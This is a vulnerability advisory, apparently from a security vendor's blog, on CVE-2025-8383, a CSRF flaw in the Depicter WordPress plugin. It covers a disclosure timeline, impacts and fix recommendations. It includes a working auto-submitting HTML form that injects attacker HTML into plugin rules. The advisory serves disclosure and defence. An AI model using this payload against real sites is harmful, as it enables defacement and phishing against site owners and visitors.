Depicter is a popular WordPress slider and content presentation plugin with 100k+ active installations. It allows administrators and editors to create dynamic documents (sliders, popups, content blocks) and define display rules that control where and how content is shown. During testing, we discovered CVE-2025-8383, a Cross-Site Request Forgery (CSRF) vulnerability that allows an attacker to force a logged-in user’s browser to execute the AJAX action depicter-document-rules-store. The attack is delivered by an unauthenticated attacker via a crafted HTML page, causing unauthorized rule updates (including injection of attacker-controlled HTML into rule titles/content) without explicit user intent.
| CVE | CVE-2025-8383 |
| Plugin Version | Depicter <= 4.0.4 |
| Critical | High |
| All Time | 1 926 955 |
| Active installations | 100 000+ |
| Publicly Published | October 30, 2025 |
| Last Updated | October 31, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8383 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/depicter/depicter-404-cross-site-request-forgery |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| July 18, 2025 | Plugin testing and vulnerability detection in the Depicter — Popup & Slider Builder have been completed |
| July 18, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| October 30, 2025 | Registered CVE-2025-8383 |
Discovery of the Vulnerability
The vulnerability exists because the AJAX endpoint behind admin-ajax.php accepts POST requests containing action=depicter-document-rules-store and does not enforce proper CSRF protection (e.g., missing check_ajax_referer() / nonce verification). As a result, if a privileged user (Admin/Editor) is logged into WordPress and visits an attacker-controlled page, their browser automatically submits a POST request that updates the document’s rules. Since the request changes plugin state and stores attacker-controlled JSON content, this issue constitutes a CSRF-driven unauthorized configuration update.
Understanding of CSRF attack’s
CSRF vulnerabilities occur when a web application performs state-changing actions based solely on the user’s authenticated session cookies, without verifying a request-specific anti-CSRF token. WordPress best practices require both a capability check (authorization) and a nonce check (CSRF protection). Many real-world plugin CVEs have resulted from missing nonce validation on AJAX handlers, enabling attackers to silently change plugin settings, create content, or modify published output. In Depicter’s case, the endpoint writes user-controlled data to rule configuration, which can be leveraged for defacement, content injection, and potentially chained attacks if the stored values are later rendered unsafely elsewhere in the admin or frontend.
Exploiting the CSRF Vulnerability
To exploit CVE-2025-8383, an attacker without cookies:
POC:
<html> <body> <form action="http://127.0.0.1/wordpress/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="depicter-document-rules-store" /> <input type="hidden" name="ID" value="1" /> <input type="hidden" name="content" value="{"rules":[{"title":"<h1>Hacked</h1>","conditions":[]}]}" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>____
The risk depends on how Depicter renders and applies stored rule content, but even in the most conservative case, this enables unauthorized modifications to display logic and document configuration. Real-world outcomes include:
- Defacement: Attackers inject visual changes (e.g., “Hacked” banners) that appear on pages where the document is displayed.
- Content manipulation: Rules can be altered to show popups/sliders on sensitive pages (checkout, login, support).
- Phishing enablement: Attackers can force display of deceptive UI elements or overlays to collect user data.
- Operational disruption: Rules can be cleared or modified to break legitimate site functionality and marketing flows.
In multi-admin environments, simply getting one privileged user to visit a malicious link is enough to cause persistent changes.
Recommendations for Improved Security
Add CSRF protection: The handler must require and validate a nonce using check_ajax_referer() before any write operation.
Strict capability checks: Ensure only authorized roles can call depicter-document-rules-store, e.g., current_user_can('manage_options') or a plugin-specific capability.
Use POST + same-origin enforcement: Explicitly require POST, validate Origin/Referer, and reject cross-site requests where feasible.
Sanitize stored content: Treat rule titles and other user-controlled fields as untrusted; apply sanitization (wp_kses_post) and safe output escaping (esc_html, esc_attr) on render.
Audit other AJAX routes: Review all admin-ajax.php actions for nonce/capability enforcement to prevent related CSRF surfaces.
By taking proactive measures to address CSRF vulnerabilities like CVE-2025-8383 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #CSRF #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.